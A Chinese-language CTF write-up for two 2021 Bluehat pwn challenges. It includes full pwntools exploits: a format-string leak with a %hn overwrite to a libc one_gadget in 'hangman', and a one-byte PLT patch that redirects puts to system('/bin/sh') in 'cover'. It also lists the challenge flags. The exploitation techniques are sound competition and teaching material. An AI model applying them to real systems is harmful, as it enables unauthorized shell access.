2021 bluehat-s wp
好久沒發過博客了,難得想起這個事情,適逢昨天剛打完比賽,👴就順手發一篇吧
pwn
早上九點開賽,大概11點左右就ak了pwn(就兩道pwn),然后都是在摸魚了
附件傳到百度網盤了,有興趣的師傅可以下載來玩一下
鏈接: https://pan.baidu.com/s/1RLpfC0LEGPJkKif8COnNpg 密碼: eq90
hangman
程序大致邏輯是,先輸入一段字符串,隨后輸入字符,統計字符串中與該字符相等的字符數目,並將數目累加到局部變量上,當局部變量與字符串長度相等時,會贏得一輪游戲,並且存在一個格式化字符串漏洞,利用該漏洞泄漏libc基地址,棧地址,改寫存放libc_start_main+240的位置,將_libc_start_main+240改成one_gadget,然后正常結束程序即可getshell 腳本有時不能打通,運行多幾次即可
exp
from pwn import*
import sys
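binary = './pwn'
elf = ELF(binary)
#nc 118.190.62.234 33445
ip = '118.190.62.234'
port = 33445
# Target selection: ``python exp.py r`` talks to the remote service with the
# libc shipped with the task; anything else spawns the local binary.  Running
# the script with no argument used to raise IndexError on sys.argv[1], so the
# length is checked first.
if len(sys.argv) > 1 and sys.argv[1] == 'r':
    p = remote(ip, port)
    libc = ELF('./libc-2.23.so')
else:
    p = process(binary)
    libc = elf.libc
context.os = 'linux'
#context.log_level = 'debug'
context.arch = 'amd64'
# Short aliases for the pwntools tube helpers (the usual template; pwn() below
# only uses sla, ru, rc, ss and irt).
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
sd = lambda s: p.send(s)
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
rl = lambda: p.recvline(keepends=False)
ss = lambda s: success(s)
dbg = lambda: gdb.attach(p)
irt = lambda: p.interactive()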
def pwn():
    """Run the hangman exploit over the tube ``p`` opened at module level.

    The game echoes the player's word through a user-controlled format string
    (see the write-up above).  The script uses that twice: first to read two
    stack slots as pointers, then to store a value two bytes at a time with
    ``%hn``.  Root cause on the program side: the input buffer is passed as
    the format argument itself; ``printf("%s", buf)`` removes both the leak
    and the write, and ``-Wformat -Werror=format-security`` flags the pattern
    at compile time.
    """
    # gdb.attach(p,'b * ($rebase)(0x13C5)')
    # Round 1 - leak.  The word is the format string; %29$p and %24$p print two
    # stack slots as hex pointers.  The word contains four 'p' characters, so
    # three guesses of 'p' accumulate 12 matches == len(word) and the round
    # ends (the counting rule is described in the write-up).
    sla('word:','%29$ppp%24$p')
    sla('letter:','p')
    sla('letter:','p')
    sla('letter:','p')
    # First pointer: the libc return address left by __libc_start_main (+240
    # in libc-2.23), from which the libc base is recovered.
    ru('0x')
    leak = rc(12)  # a 6-byte user-space address prints as 12 hex digits
    lbase = int(leak,16)- 240 -libc.sym['__libc_start_main'] # __libc_start_main+240
    ss('LIBC:'+hex(lbase))
    # Second pointer: a stack address; +8 is taken as the slot that holds the
    # return address into libc (presumably located with gdb - TODO confirm).
    ru('0x')
    leak = rc(12)
    main_ret = int(leak,16)+8
    ss('main_ret:'+hex(main_ret))
    # First candidate from the one_gadget listing at the bottom of the file.
    one_gadget = 0x45226+lbase
    ss('one_gadget:'+hex(one_gadget))
    # Split the target address into 16-bit halves for the %hn writes below.
    o1 = one_gadget & 0xffff
    o2 = (one_gadget>>16) & 0xffff
    o3 = (one_gadget>>32) & 0xffff
    # o3 is logged but never written: only the low 32 bits are patched, the
    # upper bits of the saved libc return address are presumably already
    # equal to the gadget's - verify if the script fails.
    ss('o1:'+hex(o1))
    ss('o2:'+hex(o2))
    ss('o3:'+hex(o3))
    # Round 2 - low 16 bits.  '%<o1>c' pads the output to o1 characters and
    # %15$hn stores that count as a short through the pointer found at format
    # argument 15, i.e. the p64(main_ret) appended after 24 bytes of padding.
    payload = '%{0}c%15$hn'.format(o1)
    payload = payload.ljust(14,'n') # len = 14
    payload = payload.ljust(24,'a') # len = 24 [14:24] = 'a'
    payload = payload.encode()
    payload += p64(main_ret)
    sla('word:',payload)
    # Three 'a' guesses finish the round by matching the 'a' padding bytes.
    sla('letter:','a')
    sla('letter:','a')
    sla('letter:','a')
    # Round 3 - bits 16..31, same layout, target shifted by two bytes.
    payload = '%{0}c%15$hn'.format(o2)
    payload = payload.ljust(14,'n') # len = 14
    payload = payload.ljust(24,'a') # len = 24 [14:24] = 'a'
    payload = payload.encode()
    payload += p64(main_ret+2)
    sla('word:',payload)
    sla('letter:','a')
    sla('letter:','a')
    sla('letter:','a')
    # Round 4 - an ordinary word so the game ends normally and main returns
    # through the patched slot; then hand the tube to the user.
    sla('word:','a')
    sla('letter:','a')
    irt()
if __name__ == '__main__':
    pwn()
# one_gadget output for the task's libc-2.23, kept as a bare string (a no-op
# at module level).  pwn() uses the first entry, 0x45226; the others are the
# fallbacks to try when its rax == NULL constraint does not hold.
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
flag
flag{4e20e122-d87d-452e-b7ee-b88f5acf890f}
cover
程序開始讀入5字節,前4字節為地址,可以將最后一字節,寫入該地址中,程序最后會讀入一段輸入,並執行puts輸出,攻擊思路就是修改puts的plt表中的跳轉代碼,在跳轉到got表時,程序會push一個偏移,只需將puts的偏移修改為system的偏移,即可劫持puts的plt表跳轉到system,執行system('/bin/sh')
exp
from pwn import*
import sys
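binary = './pwn'
elf = ELF(binary)
#nc 118.190.62.234 12435
ip = '118.190.62.234'
port = 12435
# Target selection: ``python exp.py r`` talks to the remote service, anything
# else spawns the local binary.  Running the script with no argument used to
# raise IndexError on sys.argv[1], so the length is checked first.  ``libc``
# is only bound on the local path (the remote ELF line is commented out); the
# pwn() below does not use it.
if len(sys.argv) > 1 and sys.argv[1] == 'r':
    p = remote(ip, port)
    # libc = ELF('./libc.so.6')
else:
    p = process(binary)
    libc = elf.libc
context.os = 'linux'
context.log_level = 'debug'
context.arch = 'amd64'
# Short aliases for the pwntools tube helpers (the usual template; pwn() below
# only uses sa, sd and irt).
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
sd = lambda s: p.send(s)
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
rl = lambda: p.recvline(keepends=False)
ss = lambda s: success(s)
dbg = lambda: gdb.attach(p)
irt = lambda: p.interactive()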
# 0x080484D0 puts_got 0x80484dc \x80
def pwn():
    """Run the cover exploit over the tube ``p`` opened at module level.

    Per the write-up, the program reads a 4-byte address plus one byte and
    stores that byte at the address with no check on the target - a single
    arbitrary byte write.  Here it is aimed at puts' PLT stub so that the
    lazy binding resolves system instead (see the note above this function).
    On the program side the fix is validating the write target; a
    non-writable text segment and full RELRO remove this class of target.
    """
    # 5 bytes: little-endian 0x080484d7 followed by the value 0x30 to store
    # there.  The write-up says this patches the relocation index that the PLT
    # stub pushes before jumping to the resolver, so "puts" binds to system.
    # NOTE(review): on Python 3 a str with \x escapes goes through pwntools'
    # context.encoding; a b'...' literal would pin the exact 5 bytes - confirm.
    sa('this','\xd7\x84\x04\x08\x30')
    sleep(2)  # let the target reach its final read before the next send
    # The final input is echoed via the hijacked puts, i.e. passed to system.
    sd('/bin/sh\x00')
    irt()
# Script entry point: run the exploit once when executed directly.
if __name__ == '__main__':
    pwn()
flag
flag{f7d89ad6-8c5a-4f0d-ae41-2410ab8855b6}